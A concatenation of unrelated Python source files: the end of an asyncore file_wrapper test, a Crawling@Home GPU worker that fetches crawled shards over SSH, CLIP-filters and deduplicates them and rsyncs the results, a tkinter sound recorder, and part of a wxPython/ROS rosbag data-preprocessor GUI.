os.close(fd)
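# asyncore.file_wrapper dup()s the descriptor, so the wrapper keeps working after the original fd is closed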
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), "It's not dead")
self.assertEqual(w.read(6), ", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = "Come again?"
d2 = "I want to buy some cheese."
fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
self.assertEqual(file(TESTFN).read(), self.d + d1 + d2)
def test_main():
tests = [HelperFunctionTests, DispatcherTests, DispatcherWithSendTests,
DispatcherWithSendTests_UsePoll]
if hasattr(asyncore, 'file_wrapper'):
tests.append(FileWrapperTest)
run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
gpu.py
|
import os
import re
import sys
import time
import trio
import uuid
import string
import random
import shutil
import curses
import zipfile
import clip_filter
import pandas as pd
import infrastructure
from glob import glob
from tqdm import tqdm
from pathlib import Path
from colorama import Fore
from gevent import joinall
sys.path.append('./crawlingathome-worker/')
from multiprocessing import JoinableQueue, Process
from pssh.clients import ParallelSSHClient, SSHClient
def incoming_worker(workers, queue: JoinableQueue, inpsize: JoinableQueue, errors: JoinableQueue):
print (f"inbound worker started")
pclient = ParallelSSHClient(workers, user='crawl', pkey="~/.ssh/id_cah", identity_auth=False )
while True:
try:
ready = []
output = pclient.run_command('test -f /home/crawl/semaphore')
pclient.join(output)
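# a worker is ready for download when /home/crawl/semaphore exists, i.e. 'test -f' exited with 0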
for host_output in output:
hostname = host_output.host
exit_code = host_output.exit_code
if exit_code == 0:
ready.append(hostname)
errors.put(f"Ready workers for download: {len(ready)}")
if len(ready) > 0:
inpsize.put(len(ready))
_start = time.time()
dclient = ParallelSSHClient(ready, user='crawl', pkey="~/.ssh/id_cah", identity_auth=False)
try:
cmds = dclient.copy_remote_file('/home/crawl/gpujob.zip', 'gpujob.zip')
joinall (cmds, raise_error=False)
except Exception as e:
print(e)
errors.put(f"all jobs downloaded in {round(time.time()-_start, 2)} seconds")
dclient.run_command('rm -rf /home/crawl/gpujob.zip')
dclient.run_command('rm -rf /home/crawl/semaphore')
for file in glob('gpujob.zip_*'):
name, ip = file.split("_")
output_folder = "./" + ip.replace(".", "-") + "/save/"
img_output_folder = output_folder + "images/"
if os.path.exists(output_folder):
shutil.rmtree(output_folder)
os.makedirs(output_folder)
os.makedirs(img_output_folder)
try:
with zipfile.ZipFile(file, 'r') as zip_ref:
zip_ref.extractall(ip.replace(".", "-")+"/")
queue.put(ip)
except:
aclient = SSHClient(ip, user='crawl', pkey="~/.ssh/id_cah", identity_auth=False)
aclient.execute('touch /home/crawl/gpuabort')
aclient.disconnect()
os.remove(file)
inpsize.get()
inpsize.task_done() # empty inpsize queue to signal no work to be done
else:
time.sleep(15)
except Exception as e:
print(f"some inbound problem occured: {e}")
def outgoing_worker(queue: JoinableQueue, errors: JoinableQueue, local):
print (f"outbound worker started")
while True:
try:
while queue.qsize() > 0:
ip, filtered = queue.get()
aclient = SSHClient(ip, user='crawl', pkey="~/.ssh/id_cah", identity_auth=False)
if local:
#os.system(f"mv {base}/gpujobdone.zip results/{time.time()}.zip")
aclient.execute(f"echo {filtered} > /home/crawl/gpulocal")
else:
base = "./" + str(ip.replace(".", "-"))
output_folder = base + "/save/"
img_output_folder = output_folder + "images/"
# clean img_output_folder now that we have all results; we do not want to transfer all the images back
try:
shutil.rmtree(img_output_folder)
except OSError as e:
print("[GPU] Error deleting images: %s - %s." %
(e.filename, e.strerror))
# send GPU results
shutil.make_archive(base + "/gpujobdone", "zip", base, "save")
aclient.scp_send(base + "/gpujobdone.zip", "gpujobdone.zip")
os.remove(base + "/gpujobdone.zip")
aclient.execute("touch gpusemaphore")
aclient.disconnect()
queue.task_done()
else:
time.sleep(5)
except Exception as e:
print(f"some outbound problem occured: {e}")
def gpu_worker(inbound: JoinableQueue, outbound: JoinableQueue, counter: JoinableQueue, errors: JoinableQueue, gpuflag: JoinableQueue, concat):
print (f"gpu worker started")
while True:
if not os.path.exists("./save/"):
os.makedirs("./save/")
if not os.path.exists("./stats/"):
os.makedirs("./stats/")
if inbound.qsize() > concat - 1:
gpuflag.put(1)
ips = []
dframes = []
shards = []
concat_parse = pd.DataFrame()
for i in range(concat):
ip = inbound.get()
output_folder = "./" + ip.replace(".", "-") + "/save/"
ips.append(ip)
all_csv_files = []
for path, subdir, files in os.walk(output_folder):
for file in glob(os.path.join(path, "*.csv")):
all_csv_files.append(file)
# get name of csv file
out_path = all_csv_files[0]
out_fname = Path(out_path).stem.strip("_unfiltered").strip("_parsed").strip(".")
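# note: str.strip() removes any of the listed characters from both ends, not the literal "_unfiltered"/"_parsed" substrings; this assumes shard names do not begin or end with those characters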
shards.append(out_fname)
os.system(f"mv {output_folder + out_fname}_parsed.csv ./stats/")
# recreate parsed dataset and run CLIP filtering
dlparse_df = pd.read_csv(output_folder + out_fname + ".csv", sep="|")
dlparse_df["PATH"] = "./" + \
ip.replace(".", "-") + "/" + dlparse_df["PATH"]
if i==0:
concat_parse = dlparse_df
else:
concat_parse = concat_parse.append(dlparse_df, ignore_index=True)
dframes.append(dlparse_df)
inbound.task_done()
#final_images = clip_filter.filter(concat_parse, out_fname, output_folder, errors)
concat_fname = uuid.uuid4().hex
with open("./save/" + concat_fname + ".txt", "wt") as f:
for item in shards:
f.write(item + "\n")
#print (f"before deduplication {concat_parse.shape[0]}")
concat_parse.to_csv("./stats/" + concat_fname + "_duplicated.csv", index=False, sep="|")
concat_parse.drop_duplicates(subset=["URL","TEXT"], keep='last', inplace=True)
concat_parse.reset_index(inplace=True, drop=True)
concat_parse.to_csv("./stats/" + concat_fname + "_unfiltered.csv", index=False, sep="|")
#print (f"after deduplication {concat_parse.shape[0]}")
start = time.time()
final_images, results = clip_filter.filter(concat_parse, concat_fname, "./save/", errors)
print(f"last filtered {final_images} images in {round(time.time()-start,2)} sec")
start = time.time()
resp = os.system(f"rsync -zh save/*{concat_fname}* archiveteam@88.198.2.17::CAH")
if resp == 0:
print (f"results sent to staging in {round(time.time()-start)} sec")
for ip in ips:
outbound.put((ip, results.get(ip)))
counter.put(1)
gpuflag.get()
gpuflag.task_done()
def monitor(nodes, inbound, outbound, counter, inpsize):
# crude terminal monitor with 3 custom bars; TODO: move to the curses module
probar = tqdm(total=int(nodes), desc="Executed GPU jobs", position=2, bar_format='{desc}: {n_fmt} ({rate_fmt}) ')
incbar = tqdm(total=int(nodes), desc="Inbound pipeline", position=1, bar_format='{desc}: {n_fmt}/{total_fmt} ({percentage:0.0f}%) ')
outbar = tqdm(total=int(nodes), desc="Outbound pipeline", position=0, bar_format='{desc}: {n_fmt}/{total_fmt} ({percentage:0.0f}%) ')
# keep main process for monitoring
while True:
incbar.n = inbound.qsize()
outbar.n = outbound.qsize()
if inpsize.qsize() > 0:
incbar.desc = Fore.GREEN + incbar.desc.strip(Fore.RED).strip(Fore.GREEN).strip(Fore.RESET) + Fore.RESET
else:
incbar.desc = Fore.RED + incbar.desc.strip(Fore.RED).strip(Fore.GREEN).strip(Fore.RESET) + Fore.RESET
if inbound.qsize()>0:
probar.desc = Fore.GREEN + probar.desc.strip(Fore.RED).strip(Fore.GREEN).strip(Fore.RESET) + Fore.RESET
else:
probar.desc = Fore.RED + probar.desc.strip(Fore.RED).strip(Fore.GREEN).strip(Fore.RESET) + Fore.RESET
if outbound.qsize()>0:
outbar.desc = Fore.GREEN + outbar.desc.strip(Fore.RED).strip(Fore.GREEN).strip(Fore.RESET) + Fore.RESET
else:
outbar.desc = Fore.RED + outbar.desc.strip(Fore.RED).strip(Fore.GREEN).strip(Fore.RESET) + Fore.RESET
incbar.refresh()
outbar.refresh()
probar.refresh()
while counter.qsize() > 0:
counter.get()
probar.update(1)
counter.task_done()
time.sleep(1)
def monitor2(nodes, inbound, outbound, counter, inpsize, stdscr, errors, gpuflag):
gpujobsdone = 0
start = time.time()
curses.curs_set(0)
curses.start_color()
curses.init_pair(1, curses.COLOR_GREEN, curses.COLOR_BLACK)
# do stuff
while True:
stdscr.clear()
while counter.qsize() > 0:
counter.get()
gpujobsdone += 1
counter.task_done()
if inpsize.qsize() > 0:
stdscr.addstr(0,0,"Downloading..", curses.A_BLINK + curses.color_pair(1))
else:
stdscr.addstr(0,0,"----------- ")
stdscr.addstr(0,13,f"Incoming pipeline ({inbound.qsize()}/{nodes})")
if outbound.qsize()>0:
stdscr.addstr(1,0,"Uploading..",curses.A_BLINK + curses.color_pair(1))
else:
stdscr.addstr(1,0,"----------- ")
stdscr.addstr(1,13,f"Outgoing pipeline ({outbound.qsize()}/{nodes})")
if gpuflag.qsize()>0:
stdscr.addstr(2,0,"Processing..", curses.A_BLINK + curses.color_pair(1))
else:
stdscr.addstr(2,0,"----------- ")
stdscr.addstr(2,13,f"GPU jobs done: {gpujobsdone}")
stdscr.addstr(3,0,f"GPU velocity: {round(60*(gpujobsdone/(time.time()-start)), 2)} jobs/m")
if errors.qsize() > 0:
msg = errors.get()
errors.task_done()
stdscr.addstr(5,0,f"messages: {msg} ")
stdscr.refresh()
time.sleep(1)
#stdscr.getkey()
if __name__ == "__main__":
YOUR_NICKNAME_FOR_THE_LEADERBOARD = os.getenv('CAH_NICKNAME')
if YOUR_NICKNAME_FOR_THE_LEADERBOARD is None:
YOUR_NICKNAME_FOR_THE_LEADERBOARD = "anonymous"
CRAWLINGATHOME_SERVER_URL = "http://cah.io.community/"
print(
f"[GPU] starting session under `{YOUR_NICKNAME_FOR_THE_LEADERBOARD}` nickname")
nodes = sys.argv[1]
location = None
skip = None
local = True
concat = 16 # how many shards to group for CLIP
if len(sys.argv) > 2:
location = sys.argv[2]
if len(sys.argv) > 3:
skip = sys.argv[3]
workers = []
if skip is None:
try:
start = time.time()
# generate cloud workers
workers = trio.run(infrastructure.up, nodes, location)
with open("workers.txt", "w") as f:
for ip in workers:
f.write(ip + "\n")
trio.run(infrastructure.wait_for_infrastructure, workers)
print(
f"[swarm] {len(workers)} nodes cloud swarm is up and was initialized in {round(time.time() - start)}s")
except KeyboardInterrupt:
print(f"[swarm] Abort! Deleting cloud swarm...")
trio.run(infrastructure.down)
print(f"[swarm] Cloud swarm was shutdown")
sys.exit()
except Exception as e:
print(f"[swarm] Error, could not bring up swarm... please consider shutting down all workers via `python3 infrastructure.py down`")
print(e)
sys.exit()
else:
with open("workers.txt", "r") as f:
for line in f.readlines():
workers.append(line.strip("\n"))
try:
# initial cleanup - delete all working files in case of crash recovery
reg_compile = re.compile(r"^\d{1,3}-\d{1,3}-\d{1,3}-\d{1,3}$")
for root, dirnames, filenames in os.walk("."):
for filename in filenames:
if filename.startswith("gpujob.zip_"):
os.remove(filename)
for dir in dirnames:
if reg_compile.match(dir):
shutil.rmtree(dir)
# initialize joinable queues to pass messages between the worker processes
inbound = JoinableQueue()
outbound = JoinableQueue()
counter = JoinableQueue()
inpsize = JoinableQueue() # use this to communicate number of jobs downloading now
gpuflag = JoinableQueue() # use this to flag that gpu is processing
errors = JoinableQueue() # use this to capture errors and warnings and route them to curses display
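# pipeline: incoming_worker downloads finished shards from the swarm, gpu_worker batches and CLIP-filters them, outgoing_worker pushes results back to each node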
# launch separate processes with specialized workers
inb = Process(target=incoming_worker, args=[workers, inbound, inpsize, errors], daemon=True)
inb.start()
time.sleep(5)
otb = Process(target=outgoing_worker, args=[outbound, errors, local], daemon=True)
otb.start()
time.sleep(5)
mon = Process(target=monitor, args=[nodes, inbound, outbound, counter, inpsize])
mon.start()
#curses.wrapper(monitor2(nodes, inbound, outbound, counter, inpsize, stdscr, errors, gpuflag))
gpu_worker(inbound, outbound, counter, errors, gpuflag, concat)
except KeyboardInterrupt:
#curses.nocbreak()
#curses.echo()
#curses.endwin()
print(f"[GPU] Abort! Deleting cloud infrastructure...")
letters = string.ascii_lowercase
suffix = ''.join(random.choice(letters) for i in range(3))
pclient = ParallelSSHClient(workers, user='crawl', pkey="~/.ssh/id_cah", identity_auth=False )
pclient.scp_recv('/home/crawl/crawl.log', suffix + '_crawl.log')
trio.run(infrastructure.down)
print(f"[infrastructure] Cloud infrastructure was shutdown")
sys.exit()
except Exception as e:
print (f"general exception: {e}")
sys.exit()
|
26_sound_recorder.py
|
import tkinter as tk
import threading
import pyaudio
import wave
class App():
chunk = 1024
sample_format = pyaudio.paInt16
channels = 2
fs = 44100
frames = []
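# note: these are class-level attributes shared by every instance; acceptable here because only one App is created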
def __init__(self, master):
self.master = master
self.isrecording = False
self.button1 = tk.Button(master, text='rec', command=self.startrecording)
self.button2 = tk.Button(master, text='stop', command=self.stoprecording)
self.button1.focus()
self.button1.pack()
self.button2.pack()
def startrecording(self):
self.p = pyaudio.PyAudio()
self.stream = self.p.open(format=self.sample_format,channels=self.channels,rate=self.fs,frames_per_buffer=self.chunk,input=True)
self.isrecording = True
print('Recording')
self.button2.focus()
t = threading.Thread(target=self.record)
t.start()
def stoprecording(self):
self.isrecording = False
self.variable = tk.StringVar()
self.name = tk.Entry(self.master, textvariable=self.variable, bg="pink", width=15)
self.name.focus()
self.name.pack()
print('recording complete')
self.button3 = tk.Button(self.master, text='SAVE', command=self.file_name)
self.button3.pack()
self.button3.focus()
def file_name(self):
self.filename = self.variable.get() + ".wav"
wf = wave.open(self.filename, 'wb')
wf.setnchannels(self.channels)
wf.setsampwidth(self.p.get_sample_size(self.sample_format))
wf.setframerate(self.fs)
wf.writeframes(b''.join(self.frames))
wf.close()
# release the audio stream and the PyAudio instance before closing the window
self.stream.stop_stream()
self.stream.close()
self.p.terminate()
self.master.destroy()
def record(self):
while self.isrecording:
data = self.stream.read(self.chunk)
self.frames.append(data)
main = tk.Tk()
main.title('Sound Recorder')
main.geometry('200x100')
app = App(main)
main.mainloop()
|
data_preprocessor.py
|
#!/usr/bin/env python
import wx
import wx.lib.buttons
import wx.lib.agw.customtreectrl as CT
import gettext
import os
import re
import sys
import fcntl
import threading
import Queue
import time
import socket
import struct
import shlex
import signal
import subprocess
import psutil
import pty
import yaml
import datetime
import syslog
from insidedesign import InsideDesign
import rtmgr
import rospy
import std_msgs.msg
from std_msgs.msg import Bool
from decimal import Decimal
from get_rosbaginfo import get_type_and_topic
SCHED_OTHER = 0
SCHED_FIFO = 1
SCHED_RR = 2
PROC_MANAGER_SOCK="/tmp/autoware_proc_manager"
class Final(InsideDesign):
def __init__(self, *args, **kwds):
super(Final, self).__init__(*args, **kwds)
self.all_procs = []
self.all_cmd_dics = []
self.load_dic = self.load_yaml('param.yaml', def_ret={})
self.config_dic = {}
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.params = []
self.all_tabs = []
self.all_th_infs = []
self.log_que = Queue.Queue()
self.log_que_stdout = Queue.Queue()
self.log_que_stderr = Queue.Queue()
self.log_que_show = Queue.Queue()
#####################################
## ros
#####################################
rospy.init_node('runtime_manager', anonymous=True)
rospy.Subscriber('to_rtmgr', std_msgs.msg.String, self.ROSCb)
self.pub = rospy.Publisher('from_rtmgr', std_msgs.msg.String, queue_size=10)
#######################################
# for Select Topic & Execution Tab
#######################################
self.label_rosbag_play_bar.Destroy()
self.label_rosbag_play_bar = BarLabel(self.tab_select, ' Playing... ')
self.label_rosbag_play_bar.Enable(False)
self.label_rosbag_play_bar2.Destroy()
self.label_rosbag_play_bar2 = BarLabel(self.tab_depth, ' Playing... ')
self.label_rosbag_play_bar2.Enable(False)
self.play = 0
self.file_path = ""
self.select = 0
self.topic_type = None
tab = self.tab_simulation
self.all_tabs.append(tab)
self.simulation_cmd = {}
self.all_cmd_dics.append(self.simulation_cmd)
dic = self.load_yaml('tab_input.yaml')
self.add_params(dic.get('params', []))
self.setup_buttons(dic.get('buttons'), self.simulation_cmd)
self.proc = 0
self.output_url = ""
self.calib_url = ""
self.depth_flag = False
self.selected_img = {}
self.selected_pcd = {}
self.image_for_depth = None
self.pointcloud_for_depth = None
self.objx = False
self.velodyne_button = False
#
# self.depth_cmd = {}
# self.all_cmd_dics.append(self.depth_cmd)
# dic = self.load_yaml('tab_depth.yaml')
# self.add_params(dic.get('params', []))
# self.setup_buttons(dic.get('buttons'), self.depth_cmd)
btn = self.button_play_rosbag_play
# setup for rosbag info
gdic = self.obj_to_gdic(btn, {})
gdic_v = dic_getset(gdic, 'file', {})
gdic_v['update_hook'] = self.rosbag_info_hook
tc = self.obj_to_varpanel_tc(btn, 'file')
if tc:
self.rosbag_info_hook( tc.GetValue() )
else:
print("Please Set Bag File")
self.topic_and_type_list = None
self.select_topic_delete_dic = {0:[], 1:[]}
self.selected_topic_dic = {}
self.select_created_topic = {}
self.selected_topic_dic2 = {}
self.runtime_dic = self.load_yaml('runtime.yaml')
self.cmd_dic = {}
try:
self._do_layout()
except Exception as e:
print(e)
cond = lambda s : s.startswith('tab_')
self.tab_names = [ self.name_get_cond(tab, cond=cond, def_ret='').replace('tab_', '', 1) for tab in self.all_tabs ]
#
new_btn_grps = ( lambda btn_names, tab_names=self.tab_names :
[ [ self.obj_get('button_{}_{}'.format(bn, tn)) for tn in tab_names ] for bn in btn_names ] )
self.alias_grps = new_btn_grps( ('rosbag', 'rviz', 'rqt') )
# ################################
# ## For CPU Bar
# ################################
# toprc = os.path.expanduser('~/.toprc')
# backup = os.path.expanduser('~/.toprc-autoware-backup')
# self.toprc_setup(toprc, backup)
#
# cpu_ibls = [ InfoBarLabel(self, 'CPU'+str(i)) for i in range(get_cpu_count()) ]
# sz = sizer_wrap(cpu_ibls, wx.HORIZONTAL, 1, wx.EXPAND, 0)
# self.sizer_cpuinfo.Add(sz, 8, wx.ALL | wx.EXPAND, 4)
#
#
# self.lb_top5 = []
# for i in range(5):
# lb = wx.StaticText(self, wx.ID_ANY, '')
# change_font_point_by_rate(lb, 0.75)
# self.lb_top5.append(lb)
# line = wx.StaticLine(self, wx.ID_ANY)
# ibl = InfoBarLabel(self, 'Memory', bar_orient=wx.HORIZONTAL)
# szr = sizer_wrap(self.lb_top5 + [ line, ibl ], flag=wx.EXPAND | wx.FIXED_MINSIZE)
# self.sizer_cpuinfo.Add(szr, 2, wx.ALL | wx.EXPAND, 4)
#
# self.status_dic = self.load_yaml('status.yaml')
#
# th_arg = { 'setting':self.status_dic.get('top_cmd_setting', {}),
# 'cpu_ibls':cpu_ibls, 'mem_ibl':ibl,
# 'toprc':toprc, 'backup':backup }
#
# thinf = th_start(self.top_cmd_th, th_arg)
# self.all_th_infs.append(thinf)
#
# font = wx.Font(10, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
# self.label_top_cmd.SetFont(font)
# icon
bm = scaled_bitmap(wx.Bitmap(rtmgr_src_dir() + 'autoware_logo_2_white.png'), 0.5)
icon = wx.EmptyIcon()
icon.CopyFromBitmap(bm)
self.SetIcon(icon)
def OnRviz(self, event):
push = event.GetEventObject()
cmd = None
if push.GetValue():
self.selected_topic_dic[push] = "RViz"
cmd = "rosrun rviz rviz -f velodyne"
self.cmd_dic[push] = (cmd, None)
self.launch_kill_proc2(push, self.cmd_dic)
else:
self.launch_kill_proc2(push, self.cmd_dic)
val = self.selected_topic_dic.pop(push)
print("Kill '%s'" % self.cmd_dic[push][0])
push.SetBackgroundColour(wx.NullColour)
def OnROSbagPlay2(self, event):
push = event.GetEventObject()
btn = self.button_play_rosbag_play
tc = self.obj_to_varpanel_tc(btn, 'file')
if tc.GetValue():
if push == self.button_play_rosbag_play2:
f = "self.rosbag_play_progress_bar2"
f = eval_if_str(self, f)
f = f if f else self.log_th
out = subprocess.PIPE if f else None
err = subprocess.STDOUT if f else None
args = ['rosbag', 'play', '--clock', tc.GetValue()]
proc = psutil.Popen(args, stdin=subprocess.PIPE, stdout=out, stderr=err)
self.all_procs.append(proc)
self.proc = proc
thinf = th_start(f, {'file':proc.stdout})
self.push = push
self.button_pause_rosbag_play2.Enable()
self.button_stop_rosbag_play2.Enable()
self.button_play_rosbag_play2.Disable()
self.button_play_rosbag_play.Disable()
self.button_play_rosbag_play2.SetBackgroundColour("#E0E0F0")
self.button_stop_rosbag_play2.SetBackgroundColour(wx.NullColour)
self.button_stop_rosbag_play2.SetForegroundColour(wx.NullColour)
self.button_pause_rosbag_play2.SetForegroundColour(wx.NullColour)
self.button_stop_rosbag_play2.SetValue(0)
self.button_pause_rosbag_play2.SetValue(0)
self.button_confirm_topics.Disable()
self.button_confirm_depth.Disable()
elif push == self.button_pause_rosbag_play2:
if self.proc:
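# sending a space to rosbag play's stdin is intended to toggle pause/resume of playback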
self.proc.stdin.write(' ')
self.button_stop_rosbag_play2.Enable()
self.button_pause_rosbag_play2.Enable()
elif push == self.button_stop_rosbag_play2:
# self.proc = self.launch_kill_proc2(self.button_play_rosbag_play2, self.cmd_dic)
self.button_play_rosbag_play2.Enable()
# self.button_play_rosbag_play2.SetCo
self.button_play_rosbag_play.Enable()
self.button_stop_rosbag_play2.Disable()
self.button_pause_rosbag_play2.Disable()
self.button_play_rosbag_play2.SetValue(0)
self.button_stop_rosbag_play2.SetValue(0)
self.button_pause_rosbag_play2.SetValue(0)
self.button_confirm_depth.Enable()
self.button_confirm_topics.Enable()
dic = { (True,True):('#F9F9F8','#8B8BB9'), (True,False):('#F9F9F8','#E0E0F0') }
self.button_play_rosbag_play2.SetBackgroundColour(wx.NullColour)
self.button_stop_rosbag_play2.SetBackgroundColour("#E0E0F0")
self.button_pause_rosbag_play2.SetBackgroundColour(wx.NullColour)
self.button_play_rosbag_play2.SetForegroundColour(wx.NullColour)
sigint = 'SIGTERM'
if True:
terminate_children(self.proc, sigint)
terminate(self.proc, sigint)
self.proc.wait()
# del self.cmd_dic[self.button_play_rosbag_play2]
if self.proc in self.all_procs:
self.all_procs.remove(self.proc)
else:
wx.MessageBox("Please Set Bag File")
def rosbag_play_progress_bar2(self, file, ev):
while not ev.wait(0):
s = self.stdout_file_search(file, 'Duration:')
if not s:
break
lst = s.split()
pos = str_to_float(lst[0])
# lst[1] is '/'
total = str_to_float(lst[2])
if total == 0:
continue
prg = int(100 * pos / total + 0.5)
pos = str(int(pos))
total = str(int(total))
wx.CallAfter(self.label_rosbag_play_bar2.set, prg)
wx.CallAfter(self.label_rosbag_play_pos2.SetLabel, pos)
wx.CallAfter(self.label_rosbag_play_total2.SetLabel, total)
wx.CallAfter(self.label_rosbag_play_bar2.clear)
wx.CallAfter(self.label_rosbag_play_pos2.SetLabel, '')
wx.CallAfter(self.label_rosbag_play_total2.SetLabel, '')
def stdout_file_search(self, file, k):
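# scan the stream character by character; once a line containing k appears, return the text on that line after k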
s = ''
while True:
c = file.read(1)
if not c:
return None
if c != '\r' and c != '\n':
s += c
continue
s = s.strip()
if k in s:
break
s = ''
i = s.find(k) + len(k)
return s[i:]
def OnConvertCheckedTopic(self, event):
push = event.GetEventObject()
cmd = None
if push.GetValue():
topic_output_info = self.select_created_topic[push]
topic_var_name = topic_output_info['name']
topic_var_panel = getattr(self, "button_" + topic_var_name)
topic_path_obj = self.obj_to_varpanel_tc(topic_var_panel, 'file')
topic_path = topic_path_obj.GetValue()
topic_output_info['path'] = topic_path
if topic_path and topic_path != 'Please Set Output Directory':
self.select_created_topic[push] = topic_output_info
if not os.path.exists(topic_path):
subprocess.call(['mkdir', '-p', topic_path])
self.selected_topic_dic[push] = topic_output_info
topic_type = topic_output_info['topic_type']
if topic_type == 'sensor_msgs/Image':
cmd = "rosrun data_preprocessor get_Image %s %s" % (topic_path, topic_output_info['topic'])
# file_format = topic_output_info['topic'][1:].replace('/', '_') + "_%08d.%s"
# cmd = "rosrun image_view image_saver image:=%s _filename_format:=%s" % (topic_output_info['topic'], file_format)
self.cmd_dic[push] = (cmd, None)
self.launch_kill_proc2(push, self.cmd_dic)
if topic_type == 'sensor_msgs/PointCloud2':
cmd = "rosrun data_preprocessor get_PCD %s %s" % (topic_path, topic_output_info['topic'])
self.cmd_dic[push] = (cmd, None)
self.launch_kill_proc2(push, self.cmd_dic)
print("launch '%s'" % self.cmd_dic[push][0])
else:
push.SetValue(0)
wx.MessageBox("Please Set Output Directory")
else:
self.launch_kill_proc2(push, self.cmd_dic)
val = self.selected_topic_dic.pop(push)
print("Kill '%s'" % self.cmd_dic[push][0])
def OnSelectPointCheckbox(self, event):
push = event.GetEventObject()
if push.GetValue():
if self.selected_pcd != {}:
for k in self.selected_pcd.keys():
if k != push:
k.SetValue(0)
self.pointcloud_for_depth = self.select_created_topic[push]
self.selected_pcd[push] = self.pointcloud_for_depth
else:
push.SetValue(0)
del self.selected_pcd[push]
self.pointcloud_for_depth = None
def OnSelectImageCheckbox(self, event):
push = event.GetEventObject()
if push.GetValue():
if self.selected_img != {}:
for k in self.selected_img.keys():
if k != push:
k.SetValue(0)
self.image_for_depth = self.select_created_topic[push]
self.selected_img[push] = self.image_for_depth
else:
push.SetValue(0)
del self.selected_img[push]
self.image_for_depth = None
def OnGetConfirmTopics(self, event):
if self.depth_flag:
self.button_confirm_depth.SetValue(0)
self.button_confirm_depth.SetBackgroundColour(wx.NullColour)
self.button_confirm_depth.SetForegroundColour(wx.NullColour)
self.launch_kill_proc2(self.button_confirm_depth, self.cmd_dic)
if self.objx:
if self.objx.GetValue():
self.objx.SetValue(0)
self.launch_kill_proc2(self.objx, self.cmd_dic, is_rapid_delete=True)
val = self.selected_topic_dic.pop(self.objx)
print("Kill '%s'" % self.cmd_dic[self.objx][0])
self.objx.SetValue(0)
self.points_raw_save.Disable()
self.points_raw_depth.Disable()
self.file_url.Disable()
if self.velodyne_button:
if self.velodyne_button.GetValue():
self.velodyne_button.SetValue(0)
self.launch_kill_proc2(self.velodyne_button, self.cmd_dic, is_rapid_delete=True)
val = self.selected_topic_dic.pop(self.velodyne_button)
print("Kill '%s'" % self.cmd_dic[self.velodyne_button][0])
self.velodyne_button.SetValue(0)
self.points_raw_save.Disable()
self.points_raw_depth.Disable()
self.file_url.Disable()
self.button_confirm_depth.Enable()
self.get_confirm_topic_list()
def get_confirm_topic_list(self):
self.get_all_topics()
self.get_depth_topic()
def OnConvertVelodyne(self, event):
push = event.GetEventObject()
cmd = None
dic = {
1:"velodyne_hdl64e_s2.launch",
2: "velodyne_hdl64e_s3.launch",
3: "velodyne_hdl32e.launch",
4: "velodyne_vlp16.launch",
5: "top_urg.launch",
6: "hokuyo_3d.launch"
}
if push.GetValue():
if ((self.file_path) and (self.select)):
self.selected_topic_dic[push] = dic[self.select]
if not((self.select == 5) or (self.select == 6)):
# cmd = "roslaunch velodyne_pointcloud 32e_points.launch"
cmd = "roslaunch" + " data_preprocessor " + dic[self.select] + " calibration:=%s" %self.file_path
else:
cmd = "roslaunch" + " data_preprocessor " + dic[self.select]
self.cmd_dic[push] = (cmd, None)
self.launch_kill_proc2(push, self.cmd_dic)
if push == self.objx:
self.points_raw_save.Enable()
self.file_url.Enable()
if push == self.velodyne_button:
self.points_raw_depth.Enable()
# if push != self.velodyne_button:
# self.file_url.Enable()
print("launch '%s'" % self.cmd_dic[push][0])
else:
push.SetValue(0)
wx.MessageBox("Please Choose Lidar")
else:
self.launch_kill_proc2(push, self.cmd_dic, is_rapid_delete=True)
val = self.selected_topic_dic.pop(push)
print("Kill '%s'" % self.cmd_dic[push][0])
push.SetValue(0)
if push == self.objx:
if self.points_raw_save.GetValue():
self.launch_kill_proc2(self.points_raw_save, self.cmd_dic)
val = self.selected_topic_dic.pop(self.points_raw_save)
print("Kill '%s'" % self.cmd_dic[self.points_raw_save][0])
self.points_raw_save.SetValue(0)
self.points_raw_save.Disable()
self.points_raw_depth.Disable()
# self.points_raw.Disable()
self.file_url.Disable()
def OnGetLidar(self, event):
dialog = DetailDialog(self)
try:
dialog.ShowModal()
finally:
dialog.Destroy()
if ((self.file_path) and (self.select)):
self.objx.Enable()
else:
self.objx.Disable()
# self.points_raw.Disable()
self.points_raw_depth.Disable()
self.points_raw_save.Disable()
self.file_url.Disable()
def OnGetDepthLidar(self, event):
dialog = DetailDialog(self)
try:
dialog.ShowModal()
finally:
dialog.Destroy()
if ((self.file_path) and (self.select)):
self.velodyne_button.Enable()
else:
self.velodyne_button.Disable()
self.points_raw_save.Disable()
self.points_raw_depth.Disable()
self.file_url.Disable()
def get_bag_url(self):
btn = self.button_play_rosbag_play
tc = self.obj_to_varpanel_tc(btn, 'file')
return tc.GetValue()
def create_url_panel(self, sss, index, topic, topic_type, obj, strings, file_type="dir", comment='Please Set Output Directory'):
button_input_name = "button_input" + str(index)
button_input_var_name = "button_input_var" + str(index)
dic = {
'buttons' : {button_input_name: {'gui': {'panel': strings},'param': button_input_var_name}},
'params' : [
{
'no_save_vars' : ['file'],
'name': button_input_var_name,
'vars': [{'kind': 'path', 'name': 'file', 'path_type' : file_type, 'v': comment}]
}]}
self.add_params(dic.get('params', []))
#################
## set URL & param bar
#################
self.setup_buttons(dic.get('buttons'), self.simulation_cmd)
button_var = getattr(self, "button_" + button_input_name)
file_url = self.obj_to_varpanel_tc(button_var, 'file')
if self.topic_type == "velodyne_msgs/VelodyneScan":
self.file_url = file_url
self.file_url.Disable()
if file_url:
topic_info = {}
topic_info['path'] = file_url.GetValue()
topic_info['topic'] = topic
topic_info['topic_type'] = topic_type
topic_info['name'] = button_input_name
self.select_created_topic[obj] = topic_info
def get_all_topic(self):
bag_url = self.get_bag_url()
self.select_created_topic = {}
if bag_url:
self.topic_and_type_list = get_type_and_topic(bag_url)
szr = self.sizer_select_topics
sss = self.select_scroll
sssb = self.sizer_select_box
if self.selected_topic_dic:
self.delete_launch()
self.delete_topic_panel(szr, num=0)
topic_conversion_dic = {
'sensor_msgs/Image' : "RGB Image",
'sensor_msgs/PointCloud2' : "PCD",
'velodyne_msgs/VelodyneScan' : "sensor_msgs/PointCloud2"
}
